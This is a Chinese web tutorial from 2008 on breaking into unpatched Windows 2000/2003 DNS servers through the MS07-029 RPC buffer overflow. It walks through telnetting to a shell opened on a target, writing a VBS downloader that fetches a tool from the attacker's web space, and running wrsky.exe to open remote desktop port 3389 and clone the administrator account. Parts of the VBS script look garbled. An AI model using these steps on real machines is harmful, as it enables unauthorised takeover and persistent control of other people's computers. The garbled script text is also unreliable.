脚本之家 服务器常用软件
快捷导航
您的位置:主页 > 网络安全 > 入侵防御 >

入侵MS07-029微软(图)

互联网   发布时间:2008-10-08 19:36:01   作者:佚名   我要评论
前言:   MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。   今天,就让我带领各路英豪,踏上DNS EXP之路。
出现“Attack sent ,check port 1100”字样,说明已经打开了目标地址的1100端口,我们TELNET上去:TELNET *.*.93.189 1100


  我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。
  下面我给大家介绍一下如何在肉鸡上面开3389,
  在命令行里输入
  @echo with wscript:if .arguments.count^ tony.vbs
  @echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs
  @echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:" web.status:.quit >> tony.vbs
  @echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs
  大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs
  然后把开3389的工具上传到你的个人空间,
  我这里用的是火狐开3389的工具,在命令行里输入
  cscript tony.vbs http://你空间地址/wrsky.exe c:\wrsky.exe


  “wrsky.exe -c”可以克隆当前管理员帐号
上一页 1 23 下一页 阅读全文

相关文章

最新评论

关注微信公众号

扫一扫